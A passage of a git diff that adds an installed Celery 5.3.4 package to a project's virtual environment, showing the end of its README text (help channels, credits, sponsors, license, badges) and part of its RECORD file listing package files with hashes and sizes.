section. + +.. _getting-help: + +Getting Help +============ + +.. _mailing-list: + +Mailing list +------------ + +For discussions about the usage, development, and future of Celery, +please join the `celery-users`_ mailing list. + +.. _`celery-users`: https://groups.google.com/group/celery-users/ + +.. _irc-channel: + +IRC +--- + +Come chat with us on IRC. The **#celery** channel is located at the +`Libera Chat`_ network. + +.. _`Libera Chat`: https://libera.chat/ + +.. 
_bug-tracker: + +Bug tracker +=========== + +If you have any suggestions, bug reports, or annoyances please report them +to our issue tracker at https://github.com/celery/celery/issues/ + +.. _wiki: + +Wiki +==== + +https://github.com/celery/celery/wiki + +Credits +======= + +.. _contributing-short: + +Contributors +------------ + +This project exists thanks to all the people who contribute. Development of +`celery` happens at GitHub: https://github.com/celery/celery + +You're highly encouraged to participate in the development +of `celery`. If you don't like GitHub (for some reason) you're welcome +to send regular patches. + +Be sure to also read the `Contributing to Celery`_ section in the +documentation. + +.. _`Contributing to Celery`: + https://docs.celeryq.dev/en/stable/contributing.html + +|oc-contributors| + +.. |oc-contributors| image:: https://opencollective.com/celery/contributors.svg?width=890&button=false + :target: https://github.com/celery/celery/graphs/contributors + +Backers +------- + +Thank you to all our backers! 🙏 [`Become a backer`_] + +.. _`Become a backer`: https://opencollective.com/celery#backer + +|oc-backers| + +.. |oc-backers| image:: https://opencollective.com/celery/backers.svg?width=890 + :target: https://opencollective.com/celery#backers + +Sponsors +-------- + +Support this project by becoming a sponsor. Your logo will show up here with a +link to your website. [`Become a sponsor`_] + +.. _`Become a sponsor`: https://opencollective.com/celery#sponsor + +|oc-sponsors| + +.. |oc-sponsors| image:: https://opencollective.com/celery/sponsor/0/avatar.svg + :target: https://opencollective.com/celery/sponsor/0/website + +.. _license: + +License +======= + +This software is licensed under the `New BSD License`. See the ``LICENSE`` +file in the top distribution directory for the full license text. + +.. # vim: syntax=rst expandtab tabstop=4 shiftwidth=4 shiftround + +.. |build-status| image:: https://github.com/celery/celery/actions/workflows/python-package.yml/badge.svg + :alt: Build status + :target: https://github.com/celery/celery/actions/workflows/python-package.yml + +.. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=main + :target: https://codecov.io/github/celery/celery?branch=main + +.. |license| image:: https://img.shields.io/pypi/l/celery.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg + :alt: Celery can be installed via wheel + :target: https://pypi.org/project/celery/ + +.. |semgrep| image:: https://img.shields.io/badge/semgrep-security-green.svg + :alt: Semgrep security + :target: https://go.semgrep.dev/home + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/celery/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg + :alt: Supported Python implementations. + :target: https://pypi.org/project/celery/ + +.. |ocbackerbadge| image:: https://opencollective.com/celery/backers/badge.svg + :alt: Backers on Open Collective + :target: #backers + +.. |ocsponsorbadge| image:: https://opencollective.com/celery/sponsors/badge.svg + :alt: Sponsors on Open Collective + :target: #sponsors + +.. 
|downloads| image:: https://pepy.tech/badge/celery + :alt: Downloads + :target: https://pepy.tech/project/celery diff --git a/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD b/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD new file mode 100644 index 00000000..5364b31c --- /dev/null +++ b/env/Lib/site-packages/celery-5.3.4.dist-info/RECORD @@ -0,0 +1,320 @@ +../../Scripts/celery.exe,sha256=uzbyQjFBXPGLYLvfUPTpg2LgHRnnAjoKN8BTF57IaeQ,97167 +celery-5.3.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +celery-5.3.4.dist-info/LICENSE,sha256=w1jN938ou6tQ1KdU4SMRgznBUjA0noK_Zkic7OOsCTo,2717 +celery-5.3.4.dist-info/METADATA,sha256=VwAVQZ0Kl2NxLaXXqYf8PcnptX9fakvtAmI2xHeTqdo,21051 +celery-5.3.4.dist-info/RECORD,, +celery-5.3.4.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery-5.3.4.dist-info/WHEEL,sha256=pkctZYzUS4AYVn6dJ-7367OJZivF2e8RA9b_ZBjif18,92 +celery-5.3.4.dist-info/entry_points.txt,sha256=FkfFPVffdhqvYOPHkpE85ki09ni0e906oNdWLdN7z_Q,48 +celery-5.3.4.dist-info/top_level.txt,sha256=sQQ-a5HNsZIi2A8DiKQnB1HODFMfmrzIAZIE8t_XiOA,7 +celery/__init__.py,sha256=N18V32hIC7cyR2Wp-uucng-ZXRTBlbBqrANrslxVudE,5949 +celery/__main__.py,sha256=0iT3WCc80mA88XhdAxTpt_g6TFRgmwHSc9GG-HiPzkE,409 +celery/__pycache__/__init__.cpython-310.pyc,, +celery/__pycache__/__main__.cpython-310.pyc,, +celery/__pycache__/_state.cpython-310.pyc,, +celery/__pycache__/beat.cpython-310.pyc,, +celery/__pycache__/bootsteps.cpython-310.pyc,, +celery/__pycache__/canvas.cpython-310.pyc,, +celery/__pycache__/exceptions.cpython-310.pyc,, +celery/__pycache__/local.cpython-310.pyc,, +celery/__pycache__/platforms.cpython-310.pyc,, +celery/__pycache__/result.cpython-310.pyc,, +celery/__pycache__/schedules.cpython-310.pyc,, +celery/__pycache__/signals.cpython-310.pyc,, +celery/__pycache__/states.cpython-310.pyc,, +celery/_state.py,sha256=k7T9CzeYR5PZSr0MjSVvFs6zpfkZal9Brl8xu-vPpXk,5029 +celery/app/__init__.py,sha256=a6zj_J9SaawrlJu3rvwCVY8j7_bIGCzPn7ZH5iUlqNE,2430 +celery/app/__pycache__/__init__.cpython-310.pyc,, +celery/app/__pycache__/amqp.cpython-310.pyc,, +celery/app/__pycache__/annotations.cpython-310.pyc,, +celery/app/__pycache__/autoretry.cpython-310.pyc,, +celery/app/__pycache__/backends.cpython-310.pyc,, +celery/app/__pycache__/base.cpython-310.pyc,, +celery/app/__pycache__/builtins.cpython-310.pyc,, +celery/app/__pycache__/control.cpython-310.pyc,, +celery/app/__pycache__/defaults.cpython-310.pyc,, +celery/app/__pycache__/events.cpython-310.pyc,, +celery/app/__pycache__/log.cpython-310.pyc,, +celery/app/__pycache__/registry.cpython-310.pyc,, +celery/app/__pycache__/routes.cpython-310.pyc,, +celery/app/__pycache__/task.cpython-310.pyc,, +celery/app/__pycache__/trace.cpython-310.pyc,, +celery/app/__pycache__/utils.cpython-310.pyc,, +celery/app/amqp.py,sha256=SWV-lr5zv1PJjGMyWQZlbJ0ToaQrzfIpZdOYEaGWgqs,23151 +celery/app/annotations.py,sha256=93zuKNCE7pcMD3K5tM5HMeVCQ5lfJR_0htFpottgOeU,1445 +celery/app/autoretry.py,sha256=PfSi8sb77jJ57ler-Y5ffdqDWvHMKFgQ_bpVD5937tc,2506 +celery/app/backends.py,sha256=__GqdylFJSa9G_JDSdXdsygfe7FjK7fgn4fZgetdUMw,2702 +celery/app/base.py,sha256=o68aTkvYf8JoYQWl7j3vtXAP5CiPK4Iwh-5MKgVXRmo,50088 +celery/app/builtins.py,sha256=gnOyE07M8zgxatTmb0D0vKztx1sQZaRi_hO_d-FLNUs,6673 +celery/app/control.py,sha256=La-b_hQGnyWxoM5PIMr-aIzeyasRKkfNJXRvznMHjjk,29170 +celery/app/defaults.py,sha256=XzImSLArwDREJWJbgt1bDz-Cgdxtq9cBfSixa85IQ0Y,15014 +celery/app/events.py,sha256=9ZyjdhUVvrt6xLdOMOVTPN7gjydLWQGNr4hvFoProuA,1326 
+celery/app/log.py,sha256=uAlmoLQH347P1WroX13J2XolenmcyBIi2a-aD6kMnZk,9067 +celery/app/registry.py,sha256=imdGUFb9CS4iiZ1pxAwcQAbe1JKKjyv9WTy94qHHQvk,2001 +celery/app/routes.py,sha256=DMdr5nmEnqJWXkLFIzWWxM2sz9ZYeA--8FeSaxKcBCg,4527 +celery/app/task.py,sha256=4bknTqa3yZ_0VFVb_aX9glA3YwCmpAP1KzCOV2x7p6A,43278 +celery/app/trace.py,sha256=cblXI8oJIU_CmJYvvES6BzcRsW9t6NguQuzDmOzdKWY,28434 +celery/app/utils.py,sha256=52e5u-PUJbwEHtNr_XdpJNnuHdC9c2q6FPkiBu_1SmY,13160 +celery/apps/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/apps/__pycache__/__init__.cpython-310.pyc,, +celery/apps/__pycache__/beat.cpython-310.pyc,, +celery/apps/__pycache__/multi.cpython-310.pyc,, +celery/apps/__pycache__/worker.cpython-310.pyc,, +celery/apps/beat.py,sha256=BX7NfHO_BYy9OuVTcSnyrOTVS1eshFctHDpYGfgKT5A,5724 +celery/apps/multi.py,sha256=1pujkm0isInjAR9IHno5JucuWcwZAJ1mtqJU1DVkJQo,16360 +celery/apps/worker.py,sha256=B1_uXLtclcrQAVHupd9B8pXubk4TCOIytGbWIsEioeQ,13208 +celery/backends/__init__.py,sha256=1kN92df1jDp3gC6mrGEZI2eE-kOEUIKdOOHRAdry2a0,23 +celery/backends/__pycache__/__init__.cpython-310.pyc,, +celery/backends/__pycache__/arangodb.cpython-310.pyc,, +celery/backends/__pycache__/asynchronous.cpython-310.pyc,, +celery/backends/__pycache__/azureblockblob.cpython-310.pyc,, +celery/backends/__pycache__/base.cpython-310.pyc,, +celery/backends/__pycache__/cache.cpython-310.pyc,, +celery/backends/__pycache__/cassandra.cpython-310.pyc,, +celery/backends/__pycache__/consul.cpython-310.pyc,, +celery/backends/__pycache__/cosmosdbsql.cpython-310.pyc,, +celery/backends/__pycache__/couchbase.cpython-310.pyc,, +celery/backends/__pycache__/couchdb.cpython-310.pyc,, +celery/backends/__pycache__/dynamodb.cpython-310.pyc,, +celery/backends/__pycache__/elasticsearch.cpython-310.pyc,, +celery/backends/__pycache__/filesystem.cpython-310.pyc,, +celery/backends/__pycache__/mongodb.cpython-310.pyc,, +celery/backends/__pycache__/redis.cpython-310.pyc,, +celery/backends/__pycache__/rpc.cpython-310.pyc,, +celery/backends/__pycache__/s3.cpython-310.pyc,, +celery/backends/arangodb.py,sha256=aMwuBglVJxigWN8L9NWh-q2NjPQegw__xgRcTMLf5eU,5937 +celery/backends/asynchronous.py,sha256=1_tCrURDVg0FvZhRzlRGYwTmsdWK14nBzvPulhwJeR4,10309 +celery/backends/azureblockblob.py,sha256=7jbjTmChq_uJlvzg06dp9q9-sMHKuS0Z3LyjXjgycdk,5127 +celery/backends/base.py,sha256=A4rgCmGvCjlLqfJGuQydE4Dft9WGUfKTqa79FAIUAsk,43970 +celery/backends/cache.py,sha256=_o9EBmBByNsbI_UF-PJ5W0u-qwcJ37Q5jaIrApPO4q8,4831 +celery/backends/cassandra.py,sha256=xB5z3JtNqmnaQY8bjst-PR1dnNgZrX8lKwEQpYiRhv8,9006 +celery/backends/consul.py,sha256=oAB_94ftS95mjycQ4YL4zIdA-tGmwFyq3B0OreyBPNQ,3816 +celery/backends/cosmosdbsql.py,sha256=XdCVCjxO71XhsgiM9DueJngmKx_tE0erexHf37-JhqE,6777 +celery/backends/couchbase.py,sha256=fyyihfJNW6hWgVlHKuTCHkzWlDjkzWQAWhgW3GJzAds,3393 +celery/backends/couchdb.py,sha256=M_z0zgNFPwFw89paa5kIQ9x9o7VRPwuKCLZgoFhFDpA,2935 +celery/backends/database/__init__.py,sha256=GMBZQy0B1igxHOXP-YoYKkr0FOuxAwesYi6MFz8wRdQ,7751 +celery/backends/database/__pycache__/__init__.cpython-310.pyc,, +celery/backends/database/__pycache__/models.cpython-310.pyc,, +celery/backends/database/__pycache__/session.cpython-310.pyc,, +celery/backends/database/models.py,sha256=_6WZMv53x8I1iBRCa4hY35LaBUeLIZJzDusjvS-8aAg,3351 +celery/backends/database/session.py,sha256=3zu7XwYoE52aS6dsSmJanqlvS6ssjet7hSNUbliwnLo,3011 +celery/backends/dynamodb.py,sha256=sEb4TOcrEFOvFU19zRSmXZ-taNDJgbb0_R-4KpNRgcg,17179 
+celery/backends/elasticsearch.py,sha256=nseWGjMB49OkHn4LbZLjlo2GLSoHCZOFObklrFsWNW4,8319 +celery/backends/filesystem.py,sha256=Q-8RCPG7TaDVJEOnwMfS8Ggygc8BYcKuBljwzwOegec,3776 +celery/backends/mongodb.py,sha256=XIL1oYEao-YpbmE0CB_sGYP_FJnSP8_CZNouBicxcrg,11419 +celery/backends/redis.py,sha256=wnl45aMLf4SSmX2JDEiFIlnNaKY3I6PBjJeL7adEuCA,26389 +celery/backends/rpc.py,sha256=Pfzjpz7znOfmHRERuQfOlTW-entAsl803oc1-EWpnTY,12077 +celery/backends/s3.py,sha256=MUL4-bEHCcTL53XXyb020zyLYTr44DDjOh6BXtkp9lQ,2752 +celery/beat.py,sha256=j_ZEA73B7NWvlGVbXVcLeOq_tFk0JNT4HiAVdvH7HG4,24455 +celery/bin/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/bin/__pycache__/__init__.cpython-310.pyc,, +celery/bin/__pycache__/amqp.cpython-310.pyc,, +celery/bin/__pycache__/base.cpython-310.pyc,, +celery/bin/__pycache__/beat.cpython-310.pyc,, +celery/bin/__pycache__/call.cpython-310.pyc,, +celery/bin/__pycache__/celery.cpython-310.pyc,, +celery/bin/__pycache__/control.cpython-310.pyc,, +celery/bin/__pycache__/events.cpython-310.pyc,, +celery/bin/__pycache__/graph.cpython-310.pyc,, +celery/bin/__pycache__/list.cpython-310.pyc,, +celery/bin/__pycache__/logtool.cpython-310.pyc,, +celery/bin/__pycache__/migrate.cpython-310.pyc,, +celery/bin/__pycache__/multi.cpython-310.pyc,, +celery/bin/__pycache__/purge.cpython-310.pyc,, +celery/bin/__pycache__/result.cpython-310.pyc,, +celery/bin/__pycache__/shell.cpython-310.pyc,, +celery/bin/__pycache__/upgrade.cpython-310.pyc,, +celery/bin/__pycache__/worker.cpython-310.pyc,, +celery/bin/amqp.py,sha256=LTO0FZzKs2Z0MBxkccaDG-dQEsmbaLLhKp-0gR4HdQA,10023 +celery/bin/base.py,sha256=mmF-aIFRXOBdjczGFePXORK2YdxLI-cpsnVrDcNSmAw,8525 +celery/bin/beat.py,sha256=qijjERLGEHITaVSGkFgxTxtPYOwl0LUANkC2s2UmNAk,2592 +celery/bin/call.py,sha256=_4co_yn2gM5uGP77FjeVqfa7w6VmrEDGSCLPSXYRp-w,2370 +celery/bin/celery.py,sha256=UW5KmKDphrt7SpyGLnZY16fc6_XI6BdSVdrxb_Vvi3U,7440 +celery/bin/control.py,sha256=nr_kFxalRvKqC2pgJmQVNmRxktnqfStlpRM51I9pXS4,7058 +celery/bin/events.py,sha256=fDemvULNVhgG7WiGC-nRnX3yDy4eXTaq8he7T4mD6Jk,2794 +celery/bin/graph.py,sha256=Ld2dKSxIdWHxFXrjsTXAUBj6jb02AVGyTPXDUZA_gvo,5796 +celery/bin/list.py,sha256=2OKPiXn6sgum_02RH1d_TBoXcpNcNsooT98Ht9pWuaY,1058 +celery/bin/logtool.py,sha256=sqK4LfuAtHuVD7OTsKbKfvB2OkfOD-K37ac9i_F8NIs,4267 +celery/bin/migrate.py,sha256=s-lCLk2bFR2GFDB8-hqa8vUhh_pJLdbmb_ZEnjLBF7Y,2108 +celery/bin/multi.py,sha256=FohM99n_i2Ca3cOh9W8Kho3k48Ml18UbpOVpPErNxDk,15374 +celery/bin/purge.py,sha256=K9DSloPR0w2Z68iMyS48ma2_d1m5v8VdwKv6mQZI_58,2608 +celery/bin/result.py,sha256=8UZHRBUaxJre8u3ox2MzxG_08H9sXGnryxbFWnoBPZs,976 +celery/bin/shell.py,sha256=D4Oiw9lEyF-xHJ3fJ5_XckgALDrsDTYlsycT1p4156E,4839 +celery/bin/upgrade.py,sha256=EBzSm8hb0n6DXMzG5sW5vC4j6WHYbfrN2Fx83s30i1M,3064 +celery/bin/worker.py,sha256=cdYBrO2P3HoNzuPwXIJH4GAMu1KlLTEYF40EkVu0veo,12886 +celery/bootsteps.py,sha256=49bMT6CB0LPOK6-i8dLp7Hpko_WaLJ9yWlCWF3Ai2XI,12277 +celery/canvas.py,sha256=O3S3p0p8K8m4kcy47h4n-hM92Ye9kg870aQEPzJYfXQ,95808 +celery/concurrency/__init__.py,sha256=CivIIzjLWHEJf9Ed0QFSTCOxNaWpunFDTzC2jzw3yE0,1457 +celery/concurrency/__pycache__/__init__.cpython-310.pyc,, +celery/concurrency/__pycache__/asynpool.cpython-310.pyc,, +celery/concurrency/__pycache__/base.cpython-310.pyc,, +celery/concurrency/__pycache__/eventlet.cpython-310.pyc,, +celery/concurrency/__pycache__/gevent.cpython-310.pyc,, +celery/concurrency/__pycache__/prefork.cpython-310.pyc,, +celery/concurrency/__pycache__/solo.cpython-310.pyc,, +celery/concurrency/__pycache__/thread.cpython-310.pyc,, 
+celery/concurrency/asynpool.py,sha256=3hlvqZ99tHXzqZZglwoBAOHNbHZ8zVBWd9soWYQrro8,51471 +celery/concurrency/base.py,sha256=atOLC90FY7who__TonZbpd2awbOinkgWSx3m15Mg1WI,4706 +celery/concurrency/eventlet.py,sha256=i4Xn3Kqg0cxbMyw7_aCTVCi7EOA5aLEiRdkb1xMTpvM,5126 +celery/concurrency/gevent.py,sha256=oExJqOLAWSlV2JlzNnDL22GPlwEpg7ExPJBZMNP4CC8,3387 +celery/concurrency/prefork.py,sha256=vdnfeiUtnxa2ZcPSBB-pI6Mwqb2jm8dl-fH_XHPEo6M,5850 +celery/concurrency/solo.py,sha256=H9ZaV-RxC30M1YUCjQvLnbDQCTLafwGyC4g4nwqz3uM,754 +celery/concurrency/thread.py,sha256=rMpruen--ePsdPoqz9mDwswu5GY3avji_eG-7AAY53I,1807 +celery/contrib/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/contrib/__pycache__/__init__.cpython-310.pyc,, +celery/contrib/__pycache__/abortable.cpython-310.pyc,, +celery/contrib/__pycache__/migrate.cpython-310.pyc,, +celery/contrib/__pycache__/pytest.cpython-310.pyc,, +celery/contrib/__pycache__/rdb.cpython-310.pyc,, +celery/contrib/__pycache__/sphinx.cpython-310.pyc,, +celery/contrib/abortable.py,sha256=ffr47ovGoIUO2gMMSrJwWPP6MSyk3_S1XuS02KxRMu4,5003 +celery/contrib/migrate.py,sha256=EvvNWhrykV3lTkZHOghofwemZ-_sixKG97XUyQbS9Dc,14361 +celery/contrib/pytest.py,sha256=ztbqIZ0MuWRLTA-RT6k5BKVvuuk2-HPoFD9-q3uHo-s,6754 +celery/contrib/rdb.py,sha256=BKorafe3KkOj-tt-bEL39R74u2njv-_7rRHfRajr3Ss,5005 +celery/contrib/sphinx.py,sha256=Fkw1dqAqUZ1UaMa7PuHct_Ccg1K0E_OdLq7duNtQkc8,3391 +celery/contrib/testing/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +celery/contrib/testing/__pycache__/__init__.cpython-310.pyc,, +celery/contrib/testing/__pycache__/app.cpython-310.pyc,, +celery/contrib/testing/__pycache__/manager.cpython-310.pyc,, +celery/contrib/testing/__pycache__/mocks.cpython-310.pyc,, +celery/contrib/testing/__pycache__/tasks.cpython-310.pyc,, +celery/contrib/testing/__pycache__/worker.cpython-310.pyc,, +celery/contrib/testing/app.py,sha256=lvW-YY2H18B60mA5SQetO3CzTI7jKQRsZXGthR27hxE,3112 +celery/contrib/testing/manager.py,sha256=WnvWLdVJQfSap5rVSKO8NV2gBzWsczmi5Fr3Hp-85-4,8605 +celery/contrib/testing/mocks.py,sha256=mcWdsxpTvaWkG-QBGnETLcdevl-bzaq3eSOSsGo2y6w,4182 +celery/contrib/testing/tasks.py,sha256=pJM3aabw7udcppz4QNeUg1-6nlnbklrT-hP5JXmL-gM,208 +celery/contrib/testing/worker.py,sha256=91V-7MfPw7FZC5pBLwvNgJ_ykA5h1QO0DRV1Bu_nI7Q,7051 +celery/events/__init__.py,sha256=9d2cviCw5zIsZ3AvQJkx77HPTlxmVIahRR7Qa54nQnU,477 +celery/events/__pycache__/__init__.cpython-310.pyc,, +celery/events/__pycache__/cursesmon.cpython-310.pyc,, +celery/events/__pycache__/dispatcher.cpython-310.pyc,, +celery/events/__pycache__/dumper.cpython-310.pyc,, +celery/events/__pycache__/event.cpython-310.pyc,, +celery/events/__pycache__/receiver.cpython-310.pyc,, +celery/events/__pycache__/snapshot.cpython-310.pyc,, +celery/events/__pycache__/state.cpython-310.pyc,, +celery/events/cursesmon.py,sha256=GfQQSJwaMKtZawPsvvQ6qGv7f613hMhAJspDa1hz9OM,17961 +celery/events/dispatcher.py,sha256=7b3-3d_6ukvRNajyfiHMX1YvoWNIzaB6zS3-zEUQhG4,8987 +celery/events/dumper.py,sha256=7zOVmAVfG2HXW79Fuvpo_0C2cjztTzgIXnaiUc4NL8c,3116 +celery/events/event.py,sha256=nt1yRUzDrYp9YLbsIJD3eo_AoMhT5sQtZAX-vEkq4Q8,1736 +celery/events/receiver.py,sha256=7dVvezYkBQOtyI-rH77-5QDJztPLB933VF7NgmezSuU,4998 +celery/events/snapshot.py,sha256=OLQuxx1af29LKnYKDoTesnPfK_5dFx3zCZ7JSdg9t7A,3294 +celery/events/state.py,sha256=DdYeAw7hGGFTMc4HRMb0MkizlkJryaysV3t8lXbxhD4,25648 +celery/exceptions.py,sha256=FrlxQiodRtx0RrJfgQo5ZMYTJ8BShrJkteSH29TCUKM,9086 
+celery/fixups/__init__.py,sha256=7ctNaKHiOa2fVePcdKPU9J-_bQ0k1jFHaoZlCHXY0vU,14 +celery/fixups/__pycache__/__init__.cpython-310.pyc,, +celery/fixups/__pycache__/django.cpython-310.pyc,, +celery/fixups/django.py,sha256=Px_oC0wTednDePOV-B9ZokMJJbYAsKhgs0zSH5tKRXA,7161 +celery/loaders/__init__.py,sha256=LnRTWk8pz2r7BUj2VUJiBstPjSBwCP0gUDRkbchGW24,490 +celery/loaders/__pycache__/__init__.cpython-310.pyc,, +celery/loaders/__pycache__/app.cpython-310.pyc,, +celery/loaders/__pycache__/base.cpython-310.pyc,, +celery/loaders/__pycache__/default.cpython-310.pyc,, +celery/loaders/app.py,sha256=xqRpRDJkGmTW21N_7zx5F4Na-GCTbNs6Q6tGfInnZnU,199 +celery/loaders/base.py,sha256=l2V-9ObaY-TQHSmmouLizOeqrTGtSq7Wvzl0CrPgVZs,8825 +celery/loaders/default.py,sha256=TZq6zR4tg_20sVJAuSwSBLVRHRyfevHkHhUYrNRYkTU,1520 +celery/local.py,sha256=8iy7CIvQRZMw4958J0SjMHcVwW7AIbkaIpBztdS5wiQ,16087 +celery/platforms.py,sha256=CIpGvQoOTrtJluX3BThBvC0iZdj0vwXgCNiOuWVqar8,25290 +celery/result.py,sha256=r4mdMl2Bts3v-1ukZTKvYd1J1SzC6-7ug12SGi9_Gek,35529 +celery/schedules.py,sha256=g40h0m5_0JfM6Rc0CH7TjyK1MC3Cf6M2rDRmGkS8hxs,32003 +celery/security/__init__.py,sha256=I1px-x5-19O-FcCQm1AHHfVB6Pp-bauwbZ-C1fxGJyc,2363 +celery/security/__pycache__/__init__.cpython-310.pyc,, +celery/security/__pycache__/certificate.cpython-310.pyc,, +celery/security/__pycache__/key.cpython-310.pyc,, +celery/security/__pycache__/serialization.cpython-310.pyc,, +celery/security/__pycache__/utils.cpython-310.pyc,, +celery/security/certificate.py,sha256=Jm-XWVQpzJxB52n4V-zHKO3YsNrlkyFpXiYhzB3QJsk,4008 +celery/security/key.py,sha256=NbocdV_aJjQMZs9DJZrStpTnkFZw_K8SICEMwalsPqI,1189 +celery/security/serialization.py,sha256=yyCQV8YzHwXr0Ht1KJ9-neUSAZJf2tuzKkpndKpvXqs,4248 +celery/security/utils.py,sha256=VJuWxLZFKXQXzlBczuxo94wXWSULnXwbO_5ul_hwse0,845 +celery/signals.py,sha256=z2T4UqrODczbaRFAyoNzO0th4lt_jMWzlxnrBh_MUCI,4384 +celery/states.py,sha256=CYEkbmDJmMHf2RzTFtafPcu8EBG5wAYz8mt4NduYc7U,3324 +celery/utils/__init__.py,sha256=lIJjBxvXCspC-ib-XasdEPlB0xAQc16P0eOPb0gWsL0,935 +celery/utils/__pycache__/__init__.cpython-310.pyc,, +celery/utils/__pycache__/abstract.cpython-310.pyc,, +celery/utils/__pycache__/collections.cpython-310.pyc,, +celery/utils/__pycache__/debug.cpython-310.pyc,, +celery/utils/__pycache__/deprecated.cpython-310.pyc,, +celery/utils/__pycache__/functional.cpython-310.pyc,, +celery/utils/__pycache__/graph.cpython-310.pyc,, +celery/utils/__pycache__/imports.cpython-310.pyc,, +celery/utils/__pycache__/iso8601.cpython-310.pyc,, +celery/utils/__pycache__/log.cpython-310.pyc,, +celery/utils/__pycache__/nodenames.cpython-310.pyc,, +celery/utils/__pycache__/objects.cpython-310.pyc,, +celery/utils/__pycache__/saferepr.cpython-310.pyc,, +celery/utils/__pycache__/serialization.cpython-310.pyc,, +celery/utils/__pycache__/sysinfo.cpython-310.pyc,, +celery/utils/__pycache__/term.cpython-310.pyc,, +celery/utils/__pycache__/text.cpython-310.pyc,, +celery/utils/__pycache__/threads.cpython-310.pyc,, +celery/utils/__pycache__/time.cpython-310.pyc,, +celery/utils/__pycache__/timer2.cpython-310.pyc,, +celery/utils/abstract.py,sha256=xN2Qr-TEp12P8AYO6WigxFr5p8kJPUUb0f5UX3FtHjI,2874 +celery/utils/collections.py,sha256=IQH-QPk2en-C04TA_3zH-6bCPdC93eTscGGx-UT_bEw,25454 +celery/utils/debug.py,sha256=9g5U0NlTvlP9OFwjxfyXgihfzD-Kk_fcy7QDjhkqapw,4709 +celery/utils/deprecated.py,sha256=4asPe222TWJh8mcL53Ob6Y7XROPgqv23nCR-EUHJoBo,3620 +celery/utils/dispatch/__init__.py,sha256=s0_ZpvFWXw1cecEue1vj-MpOPQUPE41g5s-YsjnX6mo,74 
+celery/utils/dispatch/__pycache__/__init__.cpython-310.pyc,, +celery/utils/dispatch/__pycache__/signal.cpython-310.pyc,, +celery/utils/dispatch/signal.py,sha256=LcmfBabnRAOR-wiADWQfBT-gN3Lzi29JpAcCvMLNNX4,13603 +celery/utils/functional.py,sha256=TimJEByjq8NtocfSwfEUHoic6G5kCYim3Cl_V84Nnyk,12017 +celery/utils/graph.py,sha256=oP25YXsQfND-VwF-MGolOGX0GbReIzVc9SJfIP1rUIc,9041 +celery/utils/imports.py,sha256=SlTvyvy_91RU-XMgDogLEZiPQytdblura6TLfI34CkA,5032 +celery/utils/iso8601.py,sha256=BIjBHQDYhRWgUPO2PJuQIZr6v1M7bOek8Q7VMbYcQvE,2871 +celery/utils/log.py,sha256=vCbO8Jk0oPdiXCSHTM4plJ83xdfF1qJgg-JUyqbUXXE,8757 +celery/utils/nodenames.py,sha256=URBwdtWR_CF8Ldf6tjxE4y7rl0KxFFD36HjjZcrwQ5Y,2858 +celery/utils/objects.py,sha256=NZ_Nx0ehrJut91sruAI2kVGyjhaDQR_ntTmF9Om_SI8,4215 +celery/utils/saferepr.py,sha256=3S99diwXefbcJS5UwRHzn7ZoPuiY9LlZg9ph_Sb872Y,8945 +celery/utils/serialization.py,sha256=5e1Blvm8GtkNn3LoDObRN9THJRRVVgmp4OFt0eh1AJM,8209 +celery/utils/static/__init__.py,sha256=KwDq8hA-Xd721HldwJJ34ExwrIEyngEoSIzeAnqc5CA,299 +celery/utils/static/__pycache__/__init__.cpython-310.pyc,, +celery/utils/static/celery_128.png,sha256=8NmZxCALQPp3KVOsOPfJVaNLvwwLYqiS5ViOc6x0SGU,2556 +celery/utils/sysinfo.py,sha256=LYdGzxbF357PrYNw31_9f8CEvrldtb0VAWIFclBtCnA,1085 +celery/utils/term.py,sha256=xUQR7vXr_f1-X-TG5o4eAnPGmrh5RM6ffXsdKEaMo6Y,4534 +celery/utils/text.py,sha256=e9d5mDgGmyG6xc7PKfmFVnGoGj9DAocJ13uTSZ4Xyqw,5844 +celery/utils/threads.py,sha256=_SVLpXSiQQNd2INSaMNC2rGFZHjNDs-lV-NnlWLLz1k,9552 +celery/utils/time.py,sha256=vE2m8q54MQ39-1MPUK5sNyWy0AyN4pyNOR6jhMleXEE,14987 +celery/utils/timer2.py,sha256=xv_7x_bDtILx4regqEm1ppQNenozSwOXi-21qQ4EJG4,4813 +celery/worker/__init__.py,sha256=EKUgWOMq_1DfWb-OaAWv4rNLd7gi91aidefMjHMoxzI,95 +celery/worker/__pycache__/__init__.cpython-310.pyc,, +celery/worker/__pycache__/autoscale.cpython-310.pyc,, +celery/worker/__pycache__/components.cpython-310.pyc,, +celery/worker/__pycache__/control.cpython-310.pyc,, +celery/worker/__pycache__/heartbeat.cpython-310.pyc,, +celery/worker/__pycache__/loops.cpython-310.pyc,, +celery/worker/__pycache__/pidbox.cpython-310.pyc,, +celery/worker/__pycache__/request.cpython-310.pyc,, +celery/worker/__pycache__/state.cpython-310.pyc,, +celery/worker/__pycache__/strategy.cpython-310.pyc,, +celery/worker/__pycache__/worker.cpython-310.pyc,, +celery/worker/autoscale.py,sha256=kzb1GTwRyw9DZFjwIvHrcLdJxuIGI8HaHdtvtr31i9A,4593 +celery/worker/components.py,sha256=J5O6vTT82dDUu-2AHV9RfIu4ZCERoVuJYBBXEI7_K3s,7497 +celery/worker/consumer/__init__.py,sha256=yKaGZtBzYKADZMzbSq14_AUYpT4QAY9nRRCf73DDhqc,391 +celery/worker/consumer/__pycache__/__init__.cpython-310.pyc,, +celery/worker/consumer/__pycache__/agent.cpython-310.pyc,, +celery/worker/consumer/__pycache__/connection.cpython-310.pyc,, +celery/worker/consumer/__pycache__/consumer.cpython-310.pyc,, 